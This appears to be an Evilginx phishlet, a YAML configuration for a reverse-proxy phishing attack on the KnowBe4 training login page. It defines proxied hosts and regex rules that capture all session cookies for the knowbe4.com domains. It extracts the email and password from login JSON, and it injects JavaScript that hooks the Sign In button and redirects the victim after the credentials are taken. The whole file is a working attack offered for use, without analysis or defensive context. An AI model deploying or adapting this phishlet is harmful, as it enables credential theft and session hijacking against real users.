author: '@fin3ss3g0d'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'training', orig_sub: 'training', domain: 'knowbe4.com', session: true, is_landing: true}
sub_filters:   
# Replace client's logo with knowbe4's
 - {triggers_on: 'training.knowbe4.com', orig_sub: 'training', domain: 'knowbe4.com', search: '"logoURL":"([^"]*)', replace: '"logoURL":"', mimes: ['text/html', 'application/json', 'application/x-javascript']}
# Replace knowbe4's logo with clients
# - {triggers_on: 'training.knowbe4.com', orig_sub: 'training', domain: 'knowbe4.com', search: '"logoURL":"([^"]*)', replace: '"logoURL":"https://example.com/client_logo.png', mimes: ['text/html', 'application/json', 'application/x-javascript', 'application/javascript']}
auth_tokens:
  - domain: '.training.knowbe4.com'
    keys: ['.*,regexp']
  - domain: '.knowbe4.com'
    keys: ['.*,regexp']
credentials:
  username:
    key: ''
    search: '"email":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: 'training.knowbe4.com'
  path: 'ui/login'
# Handle redirect issue, only login page will have three buttons.
# Hook Sign In button to redirect after they click it, keep checking for
# buttons every second
js_inject:
  - trigger_domains: ["training.knowbe4.com"]
    trigger_paths: ["/ui/login"]
    script: |
      async function worker() {
        const elements = document.getElementsByTagName("BUTTON");
        const num = elements.length;
        if (num < 3) {
          return;
        } else {
          document.getElementsByTagName("BUTTON")[0].onclick = redirectme;
        }
      }
      function sleeptime(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
      }
      async function redirectme() {
        await sleeptime(2000);
        window.location.href = "{redirect_url}";
      }
      function myFunction() {
        var run = setInterval("worker()", 1000); 
      }
      myFunction();